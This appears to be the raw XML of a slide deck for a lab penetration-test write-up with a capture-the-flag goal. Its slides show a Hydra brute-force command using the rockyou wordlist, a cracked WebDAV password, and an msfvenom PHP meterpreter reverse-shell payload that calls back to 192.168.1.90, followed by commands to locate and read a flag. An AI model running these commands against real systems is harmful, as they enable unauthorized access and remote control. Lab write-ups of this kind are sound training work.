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 uri="http://customooxmlschemas.google.com/">
      <go:slidesCustomData xmlns:go="http://customooxmlschemas.google.com/" r:id="rId48" roundtripDataSignature="AMtx7mgRKEEn+2Jo/VftHYqSpSP9smEM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91D39B-12C1-4ABE-989E-9FD5C636A456}">
  <a:tblStyle styleId="{ED91D39B-12C1-4ABE-989E-9FD5C636A45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customschemas.google.com/relationships/presentationmetadata" Target="metadata"/><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8db5ee2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gd8db5ee2c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86" name="Google Shape;86;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88" name="Google Shape;88;p33"/>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4"/>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5"/>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6"/>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2" name="Google Shape;132;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3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3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3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3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3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0"/>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52" name="Google Shape;152;p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0"/>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154" name="Google Shape;154;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0"/>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4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1"/>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166" name="Google Shape;16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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="180" name="Google Shape;180;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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="183" name="Google Shape;183;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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="186" name="Google Shape;186;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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="189" name="Google Shape;189;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5"/>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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1300225"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="207" name="Google Shape;207;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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2000125"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="210" name="Google Shape;210;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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2692850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="213" name="Google Shape;213;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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3390350"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="216" name="Google Shape;216;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3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="469500" y="4083075"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="226" name="Google Shape;226;p4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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="239" name="Google Shape;239;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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1828900"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="244" name="Google Shape;244;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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2419975"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="248" name="Google Shape;248;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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3011050"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="252" name="Google Shape;25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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3602137"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="256" name="Google Shape;25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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260" name="Google Shape;260;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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="276" name="Google Shape;276;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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1828900"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="281" name="Google Shape;281;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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2419975"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="285" name="Google Shape;285;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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3011050"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="289" name="Google Shape;289;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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3602137"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="293" name="Google Shape;293;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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="297" name="Google Shape;297;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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1149803"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="313" name="Google Shape;31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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1672428"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="318" name="Google Shape;31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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2195578"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="323" name="Google Shape;32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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2718203"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="328" name="Google Shape;32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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3240828"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="333" name="Google Shape;33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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3763453"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="338" name="Google Shape;33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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="4311603"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="343" name="Google Shape;34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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="355" name="Google Shape;35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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="360" name="Google Shape;36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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="365" name="Google Shape;36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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="370" name="Google Shape;37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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="375" name="Google Shape;37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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="380" name="Google Shape;38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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="385" name="Google Shape;38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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="390" name="Google Shape;39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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="402" name="Google Shape;40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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="407" name="Google Shape;40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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="412" name="Google Shape;41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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="417" name="Google Shape;41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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="422" name="Google Shape;42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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="427" name="Google Shape;42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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="432" name="Google Shape;43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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="437" name="Google Shape;43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49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="448" name="Google Shape;448;p4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4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4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49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3305156" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="453" name="Google Shape;453;p4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4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49"/>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9"/>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49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="1345853"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="458" name="Google Shape;458;p4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4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4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1"/>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06" name="Google Shape;506;p51"/>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507" name="Google Shape;507;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2"/>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52"/>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26"/>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3"/>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53"/>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53"/>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4"/>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2" name="Google Shape;562;p54"/>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563" name="Google Shape;563;p54"/>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564" name="Google Shape;564;p54"/>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5"/>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4" name="Google Shape;584;p5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55"/>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586" name="Google Shape;586;p5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6"/>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5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56"/>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5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7"/>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57"/>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57"/>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57"/>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8"/>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49" name="Google Shape;649;p58"/>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650" name="Google Shape;650;p58"/>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651" name="Google Shape;651;p58"/>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652" name="Google Shape;652;p58"/>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59"/>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4" name="Google Shape;67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59"/>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676" name="Google Shape;67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59"/>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1"/>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61"/>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61"/>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61"/>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61"/>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2"/>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62"/>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62"/>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62"/>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62"/>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7"/>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8" name="Google Shape;28;p2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3"/>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3"/>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3"/>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780" name="Google Shape;780;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5"/>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65"/>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65"/>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65"/>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65"/>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36" name="Google Shape;836;p65"/>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6"/>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59" name="Google Shape;859;p66"/>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60" name="Google Shape;860;p66"/>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61" name="Google Shape;861;p66"/>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62" name="Google Shape;862;p66"/>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63" name="Google Shape;863;p66"/>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66"/>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7"/>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7"/>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7"/>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7"/>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6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69"/>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69"/>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69"/>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69"/>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69"/>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69"/>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69"/>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0"/>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2" name="Google Shape;982;p70"/>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983" name="Google Shape;983;p70"/>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984" name="Google Shape;984;p70"/>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985" name="Google Shape;985;p70"/>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986" name="Google Shape;986;p70"/>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987" name="Google Shape;987;p70"/>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988" name="Google Shape;988;p70"/>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1"/>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91" name="Google Shape;991;p7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1"/>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1"/>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2"/>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28"/>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8"/>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8"/>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8"/>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7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7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4"/>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7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2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29"/>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6" name="Google Shape;56;p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0" name="Google Shape;60;p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0"/>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66" name="Google Shape;6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9" name="Google Shape;69;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1"/>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76" name="Google Shape;7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79" name="Google Shape;7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2"/>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a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>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No Failed Login Lockout</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116" name="Google Shape;1116;p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Hydra brute force</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#hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get</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/company_folders/secret_folder/ -t 60</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A hash of the Ryan’s password was found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118" name="Google Shape;1118;p9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1119" name="Google Shape;1119;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20" name="Google Shape;1120;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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1122" name="Google Shape;1122;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3" name="Google Shape;1123;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4" name="Google Shape;1124;p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Password for Ashton was tested against the common password dictionary “rockyou”</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Access to the /secret_folder</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Access to /webdav system</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Ryan’s password.dav was found: linux4u</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1126" name="Google Shape;1126;p9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1127" name="Google Shape;1127;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8" name="Google Shape;1128;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9" name="Google Shape;1129;p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[INSERT: screenshot or command output illustrating the exploit.]</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1131" name="Google Shape;1131;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5757750" y="1569550"/>
            <a:ext cx="3386250" cy="1038225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5757750" y="2666913"/>
            <a:ext cx="3386250" cy="1004962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1133" name="Google Shape;1133;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5757750" y="3760150"/>
            <a:ext cx="3386250" cy="12372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Reverse Shell Backdoor CVE-2019-13386</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139" name="Google Shape;1139;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#msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=4444 -f raw &gt; shell.php</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Login to webdav as Ryan to move the payload </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Listen to host: 192.168.1.90 &amp; port: 4444</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meterpreter&gt; shell </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&gt;find / -name flag.txt 2&gt;/dev/null</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="10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&gt;cat flag.txt</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1141" name="Google Shape;1141;p10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1142" name="Google Shape;1142;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3" name="Google Shape;1143;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10"/>
